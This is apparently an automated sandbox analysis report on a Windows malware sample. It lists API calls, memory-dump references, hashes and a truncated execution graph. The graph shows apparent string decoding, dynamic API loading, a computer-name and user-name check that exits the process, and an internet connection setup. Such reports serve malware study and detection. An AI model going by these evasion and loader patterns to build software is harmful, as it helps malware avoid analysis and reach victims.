                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 004EB1F4
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?), ref: 004EB201
                                                                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 004EB227
                                                                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 004EB24D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FilePointer$ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 142388799-0
                                                                                                                                                                                                                                        • Opcode ID: 57d086352e129de23eb8c72a5b19d5008727f7a3b7ea2d7399dee953bffabe00
                                                                                                                                                                                                                                        • Instruction ID: 6a58f0a310606d0e489dab38164e8a001a6d22394d130cfb135d798be1683faa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 57d086352e129de23eb8c72a5b19d5008727f7a3b7ea2d7399dee953bffabe00
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F117C71904158BBCF119F66DC489DF7F79EF05365F104146F924A22B0C775DA44EBA0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                                                                                        • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                        • Instruction ID: 265802882c011b45931b8dab0ce8665427302526ff4a013055926e7920ff6b6f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83115E7200024EBBCF5A5E84CC55CFE7F26BF58354F588455FA2859031DB36CAB1AB81
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __getptd.LIBCMT ref: 005394D4
                                                                                                                                                                                                                                          • Part of subcall function 00539E2C: __getptd_noexit.LIBCMT ref: 00539E2F
                                                                                                                                                                                                                                          • Part of subcall function 00539E2C: __amsg_exit.LIBCMT ref: 00539E3C
                                                                                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 005394F4
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 00539504
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00539534
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3170801528-0
                                                                                                                                                                                                                                        • Opcode ID: 4475b636f4b6daa432483bfe3b8c9abc6dfeee5bf802842ed03bec2671514418
                                                                                                                                                                                                                                        • Instruction ID: 56318afd035f4659b71360bc7bfe58f66f7a633ca41aa91d483472d2c21efa97
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4475b636f4b6daa432483bfe3b8c9abc6dfeee5bf802842ed03bec2671514418
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B101DDB1D01712ABDB26EF64A44A75D7F60BF80720F045115F44567281CBB46DC2CFE9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 004FEB08
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 004FEB14
                                                                                                                                                                                                                                        • ___initconout.LIBCMT ref: 004FEB24
                                                                                                                                                                                                                                          • Part of subcall function 004FEBA2: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004FEB29), ref: 004FEBB5
                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 004FEB38
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CreateErrorFileLast___initconout
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3431868840-0
                                                                                                                                                                                                                                        • Opcode ID: ce382ce60cb9a0525e661e2f6f9159153216a64f1a76c414db601adf1eedcdeb
                                                                                                                                                                                                                                        • Instruction ID: 1565e3b066c91303592beabc3d1dfe8ee9aef10dcb79466a59672929d79de011
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce382ce60cb9a0525e661e2f6f9159153216a64f1a76c414db601adf1eedcdeb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9FF08236100504BBCB221F9BDC05D57BFB7EFDA722B14481AFB4A93530DA31A814EB21
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 004FEC21
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 004FEC2D
                                                                                                                                                                                                                                        • ___initconout.LIBCMT ref: 004FEC3D
                                                                                                                                                                                                                                          • Part of subcall function 004FEBA2: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004FEB29), ref: 004FEBB5
                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 004FEC52
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CreateErrorFileLast___initconout
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3431868840-0
                                                                                                                                                                                                                                        • Opcode ID: 83f1f6e7f41d835b507b182ec8f56301a6d21b82504ebf8ece5993456dfc2956
                                                                                                                                                                                                                                        • Instruction ID: 1bc7158fade6ae130a37a529a94a50895d79f73d8da36ca92c3cd6d01f3258a8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83f1f6e7f41d835b507b182ec8f56301a6d21b82504ebf8ece5993456dfc2956
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17F01C36500619BBCF621F96DC0999A3F26FF1A3A2F004016FE0997130D6368924FB94
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • InitializeCriticalSectionEx, xrefs: 004E5D11
                                                                                                                                                                                                                                        • GetXStateFeaturesMask, xrefs: 004E5CC1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
                                                                                                                                                                                                                                        • API String ID: 0-4196971266
                                                                                                                                                                                                                                        • Opcode ID: b6edca5047ecb5dbeadcfd82669da499798b53eb31e171b93cdc83c0b4e9f940
                                                                                                                                                                                                                                        • Instruction ID: 6343cc578be647c10870d5d8240f6f7f5053dc25283f24e28174bbfa60e73565
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6edca5047ecb5dbeadcfd82669da499798b53eb31e171b93cdc83c0b4e9f940
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9801DB3568021877DB112B56CC0AEDE7F15FB50BB6F004422FD2C16160D6F58975D7D5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:5.2%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0.9%
                                                                                                                                                                                                                                        Signature Coverage:9.9%
                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                        Total number of Limit Nodes:35
                                                                                                                                                                                                                                        execution_graph 89249 418860 89250 41886b 89249->89250 89279 4027d0 89250->89279 89258 418884 89381 40fe80 89258->89381 89262 418896 89386 410040 lstrlen 89262->89386 89265 410040 3 API calls 89266 4188be 89265->89266 89267 410040 3 API calls 89266->89267 89268 4188c5 89267->89268 89390 40ff60 89268->89390 89270 4188ce 89271 4188ee OpenEventA 89270->89271 89272 418900 CloseHandle Sleep 89271->89272 89273 41892c 89271->89273 89568 410120 89272->89568 89276 418935 CreateEventA 89273->89276 89275 41891a OpenEventA 89275->89272 89275->89273 89394 417f00 89276->89394 89569 4022d0 LocalAlloc 89279->89569 89281 4027e1 89282 4022d0 11 API calls 89281->89282 89283 4027f7 89282->89283 89284 4022d0 11 API calls 89283->89284 89285 40280d 89284->89285 89286 4022d0 11 API calls 89285->89286 89287 402823 89286->89287 89288 4022d0 11 API calls 89287->89288 89289 402839 89288->89289 89290 4022d0 11 API calls 89289->89290 89291 40284f 89290->89291 89292 4022d0 11 API calls 89291->89292 89293 402868 89292->89293 89294 4022d0 11 API calls 89293->89294 89295 40287e 89294->89295 89296 4022d0 11 API calls 89295->89296 89297 402894 89296->89297 89298 4022d0 11 API calls 89297->89298 89299 4028aa 89298->89299 89300 4022d0 11 API calls 89299->89300 89301 4028c0 89300->89301 89302 4022d0 11 API calls 89301->89302 89303 4028d6 89302->89303 89304 4022d0 11 API calls 89303->89304 89305 4028ef 89304->89305 89306 4022d0 11 API calls 89305->89306 89307 402905 89306->89307 89308 4022d0 11 API calls 89307->89308 89309 40291b 89308->89309 89310 4022d0 11 API calls 89309->89310 89311 402931 89310->89311 89312 4022d0 11 API calls 89311->89312 89313 402947 89312->89313 89314 4022d0 11 API calls 89313->89314 89315 40295d 89314->89315 89316 4022d0 11 API calls 89315->89316 89317 402976 89316->89317 89318 4022d0 11 API calls 89317->89318 89319 40298c 89318->89319 89320 4022d0 11 API calls 89319->89320 89321 4029a2 89320->89321 89322 4022d0 11 API calls 89321->89322 89323 4029b8 89322->89323 89324 4022d0 11 API calls 89323->89324 89325 4029ce 89324->89325 89326 4022d0 11 API calls 89325->89326 89327 4029e4 89326->89327 89328 4022d0 11 API calls 89327->89328 89329 4029fd 89328->89329 89330 4022d0 11 API calls 89329->89330 89331 402a13 89330->89331 89332 4022d0 11 API calls 89331->89332 89333 402a29 89332->89333 89334 4022d0 11 API calls 89333->89334 89335 402a3f 89334->89335 89336 4022d0 11 API calls 89335->89336 89337 402a55 89336->89337 89338 4022d0 11 API calls 89337->89338 89339 402a6b 89338->89339 89340 4022d0 11 API calls 89339->89340 89341 402a84 89340->89341 89342 4022d0 11 API calls 89341->89342 89343 402a9a 89342->89343 89344 4022d0 11 API calls 89343->89344 89345 402ab0 89344->89345 89346 4022d0 11 API calls 89345->89346 89347 402ac6 89346->89347 89348 4022d0 11 API calls 89347->89348 89349 402adc 89348->89349 89350 4022d0 11 API calls 89349->89350 89351 402af2 89350->89351 89352 4022d0 11 API calls 89351->89352 89353 402b0b 89352->89353 89354 4022d0 11 API calls 89353->89354 89355 402b21 89354->89355 89356 4022d0 11 API calls 89355->89356 89357 402b37 89356->89357 89358 418970 LoadLibraryA 89357->89358 89359 418b97 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 89358->89359 89360 418988 GetProcAddress 89358->89360 89361 418bf8 GetProcAddress 89359->89361 89362 418c0b 89359->89362 89363 4189ab 20 API calls 89360->89363 89361->89362 89364 418c14 GetProcAddress GetProcAddress 89362->89364 89365 418c3f 89362->89365 89363->89359 89364->89365 89366 418c48 GetProcAddress 89365->89366 89367 418c5b 89365->89367 89366->89367 89368 418c64 GetProcAddress 89367->89368 89369 418c77 89367->89369 89368->89369 89370 418c80 GetProcAddress GetProcAddress 89369->89370 89371 41887a 89369->89371 89370->89371 89372 401050 89371->89372 89573 4102c0 GetProcessHeap HeapAlloc GetComputerNameA 89372->89573 89375 401088 89380 401090 CreateDCA GetDeviceCaps ReleaseDC 89375->89380 89376 401068 89575 410280 GetProcessHeap HeapAlloc GetUserNameA 89376->89575 89378 401074 strcmp 89378->89375 89379 401081 ExitProcess 89378->89379 89380->89258 89382 40fe90 89381->89382 89383 40feaf 89382->89383 89384 40fea7 lstrcpy 89382->89384 89385 410280 GetProcessHeap HeapAlloc GetUserNameA 89383->89385 89384->89383 89385->89262 89388 41008f 89386->89388 89387 4100b7 89387->89265 89388->89387 89389 4100a5 lstrcpy lstrcat 89388->89389 89389->89387 89392 40ff76 89390->89392 89391 40ffa6 89391->89270 89392->89391 89393 40ff9e lstrcpy 89392->89393 89393->89391 89395 417f22 89394->89395 89396 40fe80 lstrcpy 89395->89396 89397 417f34 89396->89397 89576 40ff10 lstrlen 89397->89576 89400 40ff10 2 API calls 89401 417fbc 89400->89401 89580 402b60 89401->89580 89407 41808a 89408 40ff60 lstrcpy 89407->89408 89409 41809d 89408->89409 90170 401130 89409->90170 89413 4180c9 89414 40ff60 lstrcpy 89413->89414 89415 4180de 89414->89415 89416 40ff60 lstrcpy 89415->89416 89417 4180ed 89416->89417 89418 40ff60 lstrcpy 89417->89418 89419 4180fc 89418->89419 89420 40ff60 lstrcpy 89419->89420 89421 41813b 89420->89421 89422 40ff60 lstrcpy 89421->89422 89423 41814d 89422->89423 90311 40fec0 89423->90311 89426 410040 3 API calls 89427 418177 89426->89427 89428 40ff60 lstrcpy 89427->89428 89429 418187 89428->89429 90315 40ffb0 89429->90315 89432 40ff60 lstrcpy 89433 4181b9 89432->89433 89434 4181d5 InternetOpenA 89433->89434 90319 410120 89434->90319 89436 4181ef InternetOpenA 89437 40fec0 lstrcpy 89436->89437 89438 41821c 89437->89438 90320 4023c0 89438->90320 89442 418240 89443 40fec0 lstrcpy 89442->89443 89444 418258 89443->89444 90342 404490 89444->90342 89446 418262 90479 412870 89446->90479 89448 41826a 89449 40fe80 lstrcpy 89448->89449 89450 41829e 89449->89450 89451 401130 lstrcpy 89450->89451 89452 4182b6 89451->89452 90499 405c90 89452->90499 89454 4182c0 90679 412220 89454->90679 89456 4182c8 89457 40fe80 lstrcpy 89456->89457 89458 4182f0 89457->89458 89459 401130 lstrcpy 89458->89459 89460 418308 89459->89460 89461 405c90 41 API calls 89460->89461 89462 418312 89461->89462 90687 412070 89462->90687 89464 41831a 89465 401130 lstrcpy 89464->89465 89466 41832e 89465->89466 90698 4158f0 89466->90698 89468 418333 89469 40fec0 lstrcpy 89468->89469 89470 418347 89469->89470 89471 40fe80 lstrcpy 89470->89471 89472 418364 89471->89472 91044 404b90 89472->91044 89474 41836d 89475 401130 lstrcpy 89474->89475 89476 4183ad 89475->89476 91065 40eb50 89476->91065 89568->89275 89570 4022f7 89569->89570 89571 40235b strlen strlen strlen strlen 89569->89571 89572 402302 6 API calls 89570->89572 89571->89281 89572->89571 89572->89572 89574 40105b strcmp 89573->89574 89574->89375 89574->89376 89575->89378 89578 40ff2a 89576->89578 89577 40ff58 89577->89400 89578->89577 89579 40ff50 lstrcpy 89578->89579 89579->89577 89581 4022d0 11 API calls 89580->89581 89582 402b71 89581->89582 89583 4022d0 11 API calls 89582->89583 89584 402b87 89583->89584 89585 4022d0 11 API calls 89584->89585 89586 402b9d 89585->89586 89587 4022d0 11 API calls 89586->89587 89588 402bb3 89587->89588 89589 4022d0 11 API calls 89588->89589 89590 402bc9 89589->89590 89591 4022d0 11 API calls 89590->89591 89592 402bdf 89591->89592 89593 4022d0 11 API calls 89592->89593 89594 402bf8 89593->89594 89595 4022d0 11 API calls 89594->89595 89596 402c0e 89595->89596 89597 4022d0 11 API calls 89596->89597 89598 402c24 89597->89598 89599 4022d0 11 API calls 89598->89599 89600 402c3a 89599->89600 89601 4022d0 11 API calls 89600->89601 89602 402c50 89601->89602 89603 4022d0 11 API calls 89602->89603 89604 402c66 89603->89604 89605 4022d0 11 API calls 89604->89605 89606 402c7f 89605->89606 89607 4022d0 11 API calls 89606->89607 89608 402c95 89607->89608 89609 4022d0 11 API calls 89608->89609 89610 402cab 89609->89610 89611 4022d0 11 API calls 89610->89611 89612 402cc1 89611->89612 89613 4022d0 11 API calls 89612->89613 89614 402cd7 89613->89614 89615 4022d0 11 API calls 89614->89615 89616 402ced 89615->89616 89617 4022d0 11 API calls 89616->89617 89618 402d06 89617->89618 89619 4022d0 11 API calls 89618->89619 89620 402d1c 89619->89620 89621 4022d0 11 API calls 89620->89621 89622 402d32 89621->89622 89623 4022d0 11 API calls 89622->89623 89624 402d48 89623->89624 89625 4022d0 11 API calls 89624->89625 89626 402d5e 89625->89626 89627 4022d0 11 API calls 89626->89627 89628 402d74 89627->89628 89629 4022d0 11 API calls 89628->89629 89630 402d8d 89629->89630 89631 4022d0 11 API calls 89630->89631 89632 402da3 89631->89632 89633 4022d0 11 API calls 89632->89633 89634 402db9 89633->89634 89635 4022d0 11 API calls 89634->89635 89636 402dcf 89635->89636 89637 4022d0 11 API calls 89636->89637 89638 402de5 89637->89638 89639 4022d0 11 API calls 89638->89639 89640 402dfb 89639->89640 89641 4022d0 11 API calls 89640->89641 89642 402e14 89641->89642 89643 4022d0 11 API calls 89642->89643 89644 402e2a 89643->89644 89645 4022d0 11 API calls 89644->89645 89646 402e40 89645->89646 89647 4022d0 11 API calls 89646->89647 89648 402e56 89647->89648 89649 4022d0 11 API calls 89648->89649 89650 402e6c 89649->89650 89651 4022d0 11 API calls 89650->89651 89652 402e82 89651->89652 89653 4022d0 11 API calls 89652->89653 89654 402e9b 89653->89654 89655 4022d0 11 API calls 89654->89655 89656 402eb1 89655->89656 89657 4022d0 11 API calls 89656->89657 89658 402ec7 89657->89658 89659 4022d0 11 API calls 89658->89659 89660 402edd 89659->89660 89661 4022d0 11 API calls 89660->89661 89662 402ef3 89661->89662 89663 4022d0 11 API calls 89662->89663 89664 402f09 89663->89664 89665 4022d0 11 API calls 89664->89665 89666 402f22 89665->89666 89667 4022d0 11 API calls 89666->89667 89668 402f38 89667->89668 89669 4022d0 11 API calls 89668->89669 89670 402f4e 89669->89670 89671 4022d0 11 API calls 89670->89671 89672 402f64 89671->89672 89673 4022d0 11 API calls 89672->89673 89674 402f7a 89673->89674 89675 4022d0 11 API calls 89674->89675 89676 402f90 89675->89676 89677 4022d0 11 API calls 89676->89677 89678 402fa9 89677->89678 89679 4022d0 11 API calls 89678->89679 89680 402fbf 89679->89680 89681 4022d0 11 API calls 89680->89681 89682 402fd5 89681->89682 89683 4022d0 11 API calls 89682->89683 89684 402feb 89683->89684 89685 4022d0 11 API calls 89684->89685 89686 403001 89685->89686 89687 4022d0 11 API calls 89686->89687 89688 403017 89687->89688 89689 4022d0 11 API calls 89688->89689 89690 403030 89689->89690 89691 4022d0 11 API calls 89690->89691 89692 403046 89691->89692 89693 4022d0 11 API calls 89692->89693 89694 40305c 89693->89694 89695 4022d0 11 API calls 89694->89695 89696 403072 89695->89696 89697 4022d0 11 API calls 89696->89697 89698 403088 89697->89698 89699 4022d0 11 API calls 89698->89699 89700 40309e 89699->89700 89701 4022d0 11 API calls 89700->89701 89702 4030b7 89701->89702 89703 4022d0 11 API calls 89702->89703 89704 4030cd 89703->89704 89705 4022d0 11 API calls 89704->89705 89706 4030e3 89705->89706 89707 4022d0 11 API calls 89706->89707 89708 4030f9 89707->89708 89709 4022d0 11 API calls 89708->89709 89710 40310f 89709->89710 89711 4022d0 11 API calls 89710->89711 89712 403125 89711->89712 89713 